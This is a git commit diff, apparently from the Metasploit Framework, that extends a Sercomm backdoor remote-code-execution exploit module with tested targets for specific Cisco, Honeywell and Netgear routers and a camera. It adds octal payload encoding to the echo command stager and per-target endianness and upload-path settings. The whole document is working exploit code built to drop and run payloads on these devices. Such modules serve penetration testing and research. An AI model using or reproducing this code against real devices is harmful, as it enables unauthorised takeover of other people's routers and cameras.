Sercomm Exploit module fixes

Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 16:58:32 -05:00 · 2014-01-13 16:58:32 -05:00 · b7b1ddf1e8
parent 804b26bac6
commit b7b1ddf1e8
2 changed files with 94 additions and 18 deletions
--- a/lib/rex/exploitation/cmdstager/echo.rb
+++ b/lib/rex/exploitation/cmdstager/echo.rb
@ -44,11 +44,19 @@ class CmdStagerEcho < CmdStagerBase


  #
-  # Encode into a "\\x55\\xAA" hex format that echo understands, where
-  # interpretation of backslash escapes are enabled
+  # Encode into a format that echo understands, where
+  # interpretation of backslash escapes are enabled. For
+  # hex, it'll look like "\\x41\\x42", and octal will be
+  # "\\101\\102"
  #
  def encode_payload(opts)
-    return Rex::Text.to_hex(@exe, "\\\\x")
+    opts[:enc_format] = opts[:enc_format] || 'hex'
+    case opts[:enc_format]
+    when 'octal'
+      return Rex::Text.to_octal(@exe, "\\\\")
+    else
+      return Rex::Text.to_hex(@exe, "\\\\x")
+    end
  end


@ -96,9 +104,16 @@ class CmdStagerEcho < CmdStagerBase
    while (encoded_dup.length > 0)
      temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
      # cut the end of the part until we reach the start
-      # of a full byte representation "\\xYZ"
-      while (temp.length > 0 && temp[-5, 3] != "\\\\x")
-        temp.chop!
+      # of a full byte representation "\\xYZ" or "\\YZ"
+      case opts[:enc_format]
+        when 'octal'
+          while (temp.length > 0 && temp[-4, 2] != "\\\\")
+            temp.chop!
+          end
+        else
+          while (temp.length > 0 && temp[-5, 3] != "\\\\x")
+           temp.chop!
+          end
      end
      parts << temp
      encoded_dup.slice!(0, temp.length)
--- a/modules/exploits/linux/misc/sercomm_exec.rb
+++ b/modules/exploits/linux/misc/sercomm_exec.rb
@ -35,14 +35,77 @@ class Metasploit3 < Msf::Exploit::Remote
      'Privileged'     => false,
      'Targets'        =>
        [
-          ['Linux MIPS Big Endian',
+          ['Generic Linux MIPS Big Endian',
            {
-              'Arch' => ARCH_MIPSBE
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV'
            }
          ],
-          ['Linux MIPS Little Endian',
+          ['Generic Linux MIPS Little Endian',
            {
-              'Arch' => ARCH_MIPSLE
+              'Arch' => ARCH_MIPSLE,
+              'PackFormat' => 'NNN'
+            }
+          ],
+          ['Cisco WAP4410N',
+            {
+              # Note this target is little endian by network comm, but
+              # big endian file format. No idea why, but it works
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'NNN',
+            }
+          ],
+          ['Honeywell WAP-PL2 IP Camera',
+            {
+              'Arch' => ARCH_MIPSLE,
+              'PackFormat' => 'VVV'
+            }
+          ],
+          ['Netgear DG834',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV',
+              'NoArgs' => true,
+            }
+          ],
+          ['Netgear DG834G',
+            {
+              # Note this target is big endian by network comm, but
+              # little endian file format. No idea why, but it works
+              'Arch' => ARCH_MIPSLE,
+              'PackFormat' => 'VVV',
+              'PayloadEncode' => 'octal'
+            }
+          ],
+          ['Netgear DG834PN',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV',
+              'NoArgs' => true
+            }
+          ],
+          ['Netgear DGN1000',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV',
+              'NoArgs' => true
+            }
+          ],
+          ['Netgear DSG835',
+            {
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'VVV',
+              'NoArgs' => true,
+            }
+          ],
+          ['Netgear WPNT834',
+            {
+              # Note this target is little endian by network comm, but
+              # big endian file format. No idea why, but it works
+              'Arch' => ARCH_MIPSBE,
+              'PackFormat' => 'NNN',
+              'UploadPath' => '/var',
+              'PayloadEncode' => 'octal'
            }
          ],
        ],
@ -76,7 +139,11 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit
-    execute_cmdstager(:noargs => true)
+    execute_cmdstager(
+      :noargs => target['NoArgs'],
+      :temp => target['UploadPath'],
+      :enc_format => target['PayloadEncode']
+    )
  end

  def endian_fingerprint
@ -109,13 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # 0x53634d4d  => Backdoor code
    # 0x07        => Exec command
    # cmd_length  => Length of command to execute, sent after communication struct
-    # According to @mandreko, probably targets specifics must be had into account
-    # when dealing with the target endiangess... work in progress
-    if target.arch.include?(ARCH_MIPSBE)
-      data = [0x4d4d6353, 0x07, cmd_length].pack("NVV")
-    else
-      data = [0x4d4d6353, 0x07, cmd_length].pack("VNN")
-    end
+    data = [0x53634d4d, 0x07, cmd_length].pack(target['PackFormat'])

    connect
    # Send command structure followed by command text